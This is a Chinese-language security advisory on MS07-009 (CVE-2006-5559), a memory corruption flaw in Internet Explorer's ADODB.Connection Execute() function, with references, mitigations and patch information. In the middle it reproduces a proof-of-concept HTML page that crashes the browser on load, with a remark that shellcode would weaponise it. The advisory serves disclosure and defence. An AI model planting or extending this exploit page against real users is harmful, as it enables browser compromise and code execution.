安全研究
安全漏洞
Microsoft IE ADODB.Connection对象Execute函数内存破坏漏洞(MS07-009)
发布日期:2006-10-24
更新日期:2007-02-14
受影响系统:
Microsoft Windows XP SP2描述:
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
BUGTRAQ ID: 20704
CVE(CAN) ID: CVE-2006-5559
Internet Explorer是微软发布的非常流行的WEB浏览器。
IE中ADODB.Connection ActiveX对象的Execute()函数存在内存破坏漏洞,允许远程攻击者通过诱骗用户访问恶意WEB页面或HTML文档导致浏览器崩溃或执行任意代码。
Execute()函数允许恶意脚本以绕过脚本解释程序内存管理器的方式释放堆内存。Execute的第二个参数是一个变量,传送给了VariantClear,如果变量代表BSTR的话就会使用SysFreeString释放相关的字符串内存。脚本解释程序无法知道字符串内存已被释放,可能会在Execute调用返回后双重释放或重新使用内存。
<*来源:YAG KOHHA (skyhole@gmail.com)
链接:http://blogs.technet.com/msrc/archive/2006/10/27/adodb-connection-poc-published.aspx
http://www.kb.cert.org/vuls/id/589272
http://www.microsoft.com/technet/security/Bulletin/ms07-009.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA07-044A.html
http://research.eeye.com/html/alerts/zeroday/20061027.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
// Internet Explorer 'ADODB.Connection' object 'Execute' Function
Vulnerability POC
// tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed
// Author: YAG KOHHA (skyhole [at] gmail.com)
// Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic
// Access violation at:
// ----------------------------------------------------
// 77114D0F 66:8B75 00 MOV SI,WORD PTR SS:[EBP]
// ----------------------------------------------------
// P.S. It`s will be fast with some shellcode :P
--!>
<html>
<head>
<title>ADODB.Connection.Execute CRASH TEST</title>
</head>
<script>
function Bang_Bang() {
var a = new ActiveXObject('ADODB.Connection.2.7');
var b = 'FUCK';
while (b.length <= 1024*256) b+=b;
for (var i = 0; i < 32768; i++)
try { a.Execute(b,b,b); } catch(e) {}
}
</script>
<body onLoad='Bang_Bang()'>
<center><h1>WOW!!! Are U live?</h1></center>
</body></html>
建议:
临时解决方法:
* 禁止在Internet Explorer中运行ADODB.Connection ActiveX控件。将下列文本保存到一个.reg文件中并在有漏洞的客户端上运行该.reg文件。
Windows 注册表编辑器 5.00 版
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000514-0000-0010-8000-00AA006D2EA4}]
Compatibility Flags=dword:00000400
您可以通过双击此.reg文件将其应用到各个系统。您还可以使用组策略跨域应用该文件。
* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件之前进行提示。
* 将Internet和本地intranet安全区设置为“高”以在运行ActiveX控件和活动脚本之前要求提示。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS07-009)以及相应补丁:
MS07-009:Vulnerability in Microsoft Data Access Components Could Allow Remote Code Execution (927779)
链接:http://www.microsoft.com/technet/security/Bulletin/ms07-009.mspx?pf=true
浏览次数:4710
严重程度:0(网友投票)
绿盟科技给您安全的保障
